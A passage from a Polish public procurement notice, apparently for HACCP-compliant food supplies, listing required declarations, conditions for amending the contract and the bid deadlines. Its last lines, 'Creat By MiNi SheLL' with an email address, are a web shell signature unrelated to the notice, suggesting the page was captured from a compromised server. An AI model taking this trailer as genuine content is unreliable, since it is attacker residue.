Higieniczna) systemu HACCP, spełniać wymogi określone w ustawie z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywieniu (Dz.U. z 2023 r., poz. 1448)<br/>3)	OŚWIADCZENIE O NIEPODLEGANIU WYKLUCZENIU, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym przez Zamawiającego – wypełniony Załącznik nr 3 do SWZ stanowiący oświadczenie dotyczące odpowiednio: Wykonawcy; każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej.<br/>4)	OŚWIADCZENIE WYKONAWCY w zakresie przeciwdziałania wspierania agresji na Ukrainę oraz służące ochronie bezpieczeństwa narodowego – w zakresie wskazanym przez Zamawiającego – wypełniony Załącznik nr 5 do SWZ stanowiący oświadczenie dotyczące odpowiednio: Wykonawcy; każdego ze wspólników konsorcjum (w przypadku składania oferty wspólnej) oraz każdego ze wspólników spółki cywilnej.<br/>5)	PEŁNOMOCNICTWO ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego (jeżeli dotyczy).W przypadku składania oferty wspólnej przez kilku przedsiębiorców <br/>(tzw. Konsorcjum) wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane elektronicznie przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku składania oferty wspólnej przez kilku przedsiębiorców <br/>(tzw. Konsorcjum) wspólnicy muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy. Do oferty należy dołączyć stosowne pełnomocnictwo, podpisane elektronicznie przez osoby upoważnione do składania oświadczeń woli każdego ze wspólników. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zakazuje się zmian postanowień niniejszej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, ze zachodzi najmniej jedna z okoliczności przewidzianych przez Zamawiającego.<br/>Zamawiający przewiduje możliwość zmiany:<br/>1)	strony umowy w przypadku następstwa prawnego wynikające z odrębnych przepisów;<br/>2)	wynagrodzenia Wykonawcy (w tym cen jednostkowych) brutto, w przypadku zmiany<br/>	przepisów obowiązujących dot. podatku VAT;<br/>3)	podwyższenia cen jednostkowych określonego produktu w sytuacji wzrostu cen na rynku.<br/>Niniejsza zmiana może nastąpić najwcześniej po upływie 3 miesięcy od daty obowiązywania niniejszej umowy, nie częściej niż raz na kwartał i w wysokości nie wyższej niż o wskaźnik wzrostu cen towarów i usług konsumpcyjnych publikowany w komunikacie Prezesa Głównego Urzędu Statystycznego. W takim przypadku ceny zostaną podwyższone z pierwszym dniem miesiąca następującego po miesiącu, w którym złożono pismo wnioskujące o zmianę;<br/>4)	nazwy produktu (producenta) pod warunkiem zaoferowania produktów nie gorszych <br/>	jakościowo od dotychczas dostarczanych przy jednoczesnym zachowaniu <br/>	dotychczasowych lub niższych cen jednostkowych.<br/>	Niniejsza zmiana może nastąpić w przypadku :<br/>a)	zaprzestania produkcji danego asortymentu przez producenta,<br/>b)	zmiany gramatury danej pozycji asortymentowej przez producenta produktu,<br/>c)	niedostępności produktu na rynku powyżej 14 dni kalendarzowych,<br/>d) treści umowy w sytuacji wynikłej ze zmiany regulacji prawnych obowiązujących w dniu <br/>	jej zawarcia.<br/>2.	Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie wniosku Wykonawcy wykazującego zasadność wprowadzenia zmian i zgody Zamawiającego na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego.<br/>3.	Jakiekolwiek zmiany nin. umowy wymagają – pod rygorem nieważności – zachowania formy pisemnej w postaci aneksu, z zastrzeżeniem ust.4.<br/>4. Strony uzgadniają możliwość obniżenia ceny jednostkowej określonego produktu w przypadku obniżenia cen produktów na rynku (np. określenie ceny sugerowanej) lub udzielenia bonifikaty przez Wykonawcę w stosunku do ceny oferty, na podstawie której została zawarta niniejsza umowa. Niniejsza zmiana ceny jednostkowej mająca charakter jednorazowej promocji nie powoduje zmiany treści umowy; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-11-27 07:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ezamowienia.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-11-27 08:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com